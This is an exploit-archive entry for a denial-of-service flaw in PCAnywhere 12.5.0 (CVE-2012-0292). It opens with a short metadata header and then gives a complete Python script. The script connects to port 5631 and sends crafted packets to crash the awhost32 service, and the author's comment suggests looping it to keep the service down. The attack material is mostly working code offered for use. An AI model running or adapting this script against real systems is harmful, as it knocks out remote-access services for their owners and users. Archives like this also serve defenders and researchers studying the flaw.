PCAnyWhere 12.5.0 build 463 Denial of Service

2012.03.09
Credit: Johnathan Norman
Risk: Medium
Local: Yes
Remote: No
CVE: CVE-2012-0292
CWE: CWE-20


CVSS Base Score: 5/10
Impact Subscore: 2.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: None
Integrity impact: None
Availability impact: Partial

#!/usr/bin/python ''' Exploit Title: PCAnywhere Nuke Date: 2/16/12 Author: Johnathan Norman spoofy <at> exploitscience.org or @spoofyroot Version: PCAnyWhere (12.5.0 build 463) and below Tested on: Windows Description: The following code will crash the awhost32 service. It'll be respawned so if you want to be a real pain you'll need to loop this.. my inital impressions are that controlling execuction will be a pain. ''' import sys import socket import argparse if len(sys.argv) != 2: print "[+] Usage: ./pcNuke.py <HOST>" sys.exit(1) HOST = sys.argv[1] PORT = 5631 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((HOST, PORT)) # HELLO! s.send("\x00\x00\x00\x00") buf = s.recv(1024) # ACK! s.send("\x6f\x06\xfe") buf = s.recv(1024) # Auth capability part 1 s.send("\x6f\x62\xff\x09\x00\x07\x00\x00\x01\xff\x00\x00\x07\x00") # Auth capability part 2 s.send("\x6f\x62\xff\x09\x00\x07\x00\x00\x01\xff\x00\x00\x07\x00")

References:

http://www.securityfocus.com/bid/52094
http://www.exploit-db.com/exploits/18493/


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top